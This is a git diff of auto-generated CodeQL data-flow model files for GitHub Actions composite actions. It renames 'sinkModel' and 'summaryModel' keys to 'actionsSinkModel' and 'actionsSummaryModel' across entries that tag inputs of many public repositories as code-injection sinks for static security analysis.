@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 53c6258551f..91463a305dd 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 62a4f2bbcd7..7ef240ad999 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 6dffbff40d3..db953acf5bc 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index ac72bb9ebf0..7c1b01e14b5 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index b3f1ca67eef..37b67a933a3 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 44f5ad66096..570a9bdd142 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index c2e56f7e175..8c1993c47ca 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index 54d0c8b2fe0..ee0adaadb3e 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index b1914e7a96b..c127f03bb66 100644 
--- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index dd66f206ee9..3b3d60fadd0 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 0c26f02e6d8..4dd43acd2c5 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 2ee13115d6d..cb4bff25f9a 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b6604..39a204389b9 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46..6b4192c0c61 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7..63c3fc89058 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5..72772ae47cf 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8d..43cc1e0187e 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f..7c80b7e6eda 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f966813..1f7b69e6254 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c25953944..7879a7903b4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4..dbbd4c720ca 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e..f99698b1992 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9..a98a135d6b4 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d26058..3ebb5e7acb3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e477..b26aa6ea48b 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d336..683965e13d2 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac006..9358c895f3c 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378..8233e506603 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf..2aea730db7e 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a25123..b03d2391882 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504fab..9db70f02db4 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9..8cea15ac9e1 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4b..766ec515551 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3..13ee2f4e7a8 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529..0cf05c2273b 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 88348f05cd0..7f2622feecd 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed472..3aa8c3bc649 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a0..b79317db9c8 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e1..843e0d20b98 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c..2a0fd3ac371 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19cc..3ef29cc9b84 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179..71d2012eb02 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e..a67aeb90595 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e85557..1f5dd108f91 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273d..ea4a2a2a3c7 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8..29973ccdbd7 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c44858..2db70ffea66 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d..8a4273e8caf 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml 
